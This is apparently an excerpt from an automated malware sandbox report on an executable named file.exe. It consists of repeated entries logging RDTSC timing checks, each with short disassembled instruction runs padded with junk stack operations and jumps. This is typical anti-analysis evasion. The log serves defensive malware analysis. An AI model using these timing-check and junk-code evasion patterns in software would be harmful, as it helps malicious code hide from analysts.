    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344D64 second address: 344D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jng 00007F65504F5A46h 0x0000000e jbe 00007F65504F5A46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 347F6D second address: 347F83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F655118F74Bh 0x00000008 jl 00007F655118F746h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 347AFC second address: 347B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 347B00 second address: 347B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 347B04 second address: 347B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A52h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F65504F5A46h 0x00000012 jbe 00007F65504F5A46h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 347B2B second address: 347B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F655118F746h 0x0000000c jmp 00007F655118F754h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 347C56 second address: 347C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A57h 0x00000009 jne 00007F65504F5A46h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34AA08 second address: 34AA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F655118F74Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351A3C second address: 351A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A56h 0x00000007 jmp 00007F65504F5A59h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F65504F5A4Eh 0x00000013 pop edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F65504F5A46h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350D6C second address: 350D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350D70 second address: 350D78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350D78 second address: 350D7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35101C second address: 351020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351020 second address: 351024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 351024 second address: 35102A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35102A second address: 351031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35118D second address: 35119C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F65504F5A46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35119C second address: 3511A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3511A0 second address: 3511A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356E6B second address: 356E85 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c jnc 00007F655118F748h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35576D second address: 355782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355782 second address: 35579B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F655118F74Dh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355930 second address: 355936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355936 second address: 35593A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35593A second address: 355940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355A8B second address: 355A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355E2D second address: 355E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F65504F5A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355E3C second address: 355E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355E48 second address: 355E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30003C second address: 300046 instructions: 0x00000000 rdtsc 0x00000002 js 00007F655118F74Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300046 second address: 300051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300051 second address: 30005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30005B second address: 300085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 nop 0x00000007 jnp 00007F65504F5A4Ch 0x0000000d mov ebx, dword ptr [ebp+1247F0A4h] 0x00000013 mov dl, D3h 0x00000015 add eax, ebx 0x00000017 push edi 0x00000018 mov di, C43Dh 0x0000001c pop edx 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300085 second address: 300089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300089 second address: 30008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30008F second address: 3000C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jmp 00007F655118F753h 0x00000010 pop eax 0x00000011 nop 0x00000012 mov ecx, edx 0x00000014 push 00000004h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3560D9 second address: 3560DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3560DE second address: 3560E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3560E3 second address: 3560E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3560E9 second address: 356111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F655118F751h 0x00000009 jmp 00007F655118F74Dh 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3592F4 second address: 359303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A4Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 359303 second address: 359321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F655118F74Ch 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3595E2 second address: 3595EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3595EE second address: 3595F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EA75 second address: 35EA7F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65504F5A5Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EA7F second address: 35EA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F655118F74Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F655118F746h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35ED54 second address: 35ED59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35FEE7 second address: 35FEF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364D96 second address: 364D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36409D second address: 3640C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F655118F746h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F655118F755h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3640C0 second address: 3640C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3640C4 second address: 3640C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3644C6 second address: 3644D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364944 second address: 364948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37109B second address: 3710D2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65504F5A46h 0x00000008 jmp 00007F65504F5A52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007F65504F5A51h 0x00000016 jo 00007F65504F5A52h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3710D2 second address: 3710D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F931 second address: 36F935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36F935 second address: 36F939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FAA1 second address: 36FAB0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65504F5A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FAB0 second address: 36FABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FABD second address: 36FAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A53h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65504F5A51h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FAEA second address: 36FAF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FAF2 second address: 36FAF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FAF7 second address: 36FAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FAFD second address: 36FB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65504F5A46h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FC6D second address: 36FC7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FC7F second address: 36FC84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FDCA second address: 36FDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FDD1 second address: 36FDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65504F5A54h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FDE9 second address: 36FDF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F655118F746h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36FDF9 second address: 36FDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377670 second address: 377674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377674 second address: 377678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 377678 second address: 377688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007F655118F760h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38627E second address: 386288 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65504F5A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 386288 second address: 38628E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3882BB second address: 3882E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A55h 0x00000009 jo 00007F65504F5A46h 0x0000000f popad 0x00000010 pushad 0x00000011 ja 00007F65504F5A46h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E19D second address: 38E1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E1A1 second address: 38E1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E1AC second address: 38E1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E1B0 second address: 38E1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A59h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F65504F5A46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38E1D9 second address: 38E1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BE5C second address: 39BE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F65504F5A46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BE66 second address: 39BE9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F655118F759h 0x00000010 jbe 00007F655118F746h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BCC1 second address: 39BCD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A4Dh 0x00000007 js 00007F65504F5A52h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39E27B second address: 39E281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39E281 second address: 39E285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3DFE second address: 3A3E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Dh 0x00000007 jng 00007F655118F746h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F655118F748h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3E1D second address: 3A3E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3E22 second address: 3A3E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3E31 second address: 3A3E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F65504F5A59h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3E52 second address: 3A3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3FAF second address: 3A3FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3FB8 second address: 3A3FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3FBC second address: 3A3FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3FC4 second address: 3A4002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F755h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jl 00007F655118F746h 0x00000010 jmp 00007F655118F752h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F655118F746h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4199 second address: 3A419D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A419D second address: 3A41C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ebx 0x00000008 pushad 0x00000009 jmp 00007F655118F758h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4743 second address: 3A4747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4747 second address: 3A4766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F655118F755h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4766 second address: 3A476A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A476A second address: 3A4772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B33F6 second address: 3B3402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
